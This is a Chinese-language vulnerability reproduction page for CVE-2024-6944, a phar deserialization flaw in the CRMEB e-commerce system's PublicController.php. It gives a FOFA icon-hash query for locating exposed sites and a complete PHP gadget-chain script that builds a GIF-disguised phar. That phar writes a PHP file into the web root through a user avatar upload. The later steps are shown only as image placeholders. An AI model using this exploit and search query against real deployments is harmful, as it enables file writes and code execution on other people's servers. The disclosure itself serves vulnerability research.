Skip to content

Latest commit

 

History

History
87 lines (60 loc) · 1.99 KB

CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md

File metadata and controls

87 lines (60 loc) · 1.99 KB

CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944)

钟邦科技CRMEB 5.4.0版本中发现一个关键漏洞。受影响的是PublicController.php文件中的get_image_base64函数。参数文件的操作会导致反序列化。攻击可能远程发起。该漏洞已被公开披露并可能被利用。

fofa

icon_hash="-847565074"

漏洞复现

生成phar文件并gzip压缩

<?php

namespace GuzzleHttp\Cookie{

    class SetCookie {

        function __construct()
        {
            $this->data['Expires'] = '<?php phpinfo();?>';
            $this->data['Discard'] = 0;
        }
    }

    class CookieJar{
        private $cookies = [];
        private $strictMode;
        function __construct() {
            $this->cookies[] = new SetCookie();
        }
    }

    class FileCookieJar extends CookieJar {
        private $filename;
        private $storeSessionCookies;
        function __construct() {
            parent::__construct();
            $this->filename = "D:/phpstudy/WWW/crmeb/public/shell.php";
            $this->storeSessionCookies = true;
        }
    }
}

namespace{
    $exp = new GuzzleHttp\Cookie\FileCookieJar();

    $phar = new Phar('test.phar');
    $phar -> stopBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); 
    $phar -> addFromString('test.txt','test');
    $phar -> setMetadata($exp);
    $phar -> stopBuffering();
    rename('test.phar','test.jpg');
}

?>

gzip压缩文件

gzip test.jpg

注册用户上传头像

image.png

image.png

触发phar反序列化

image.png

成功写入

image.png

漏洞来源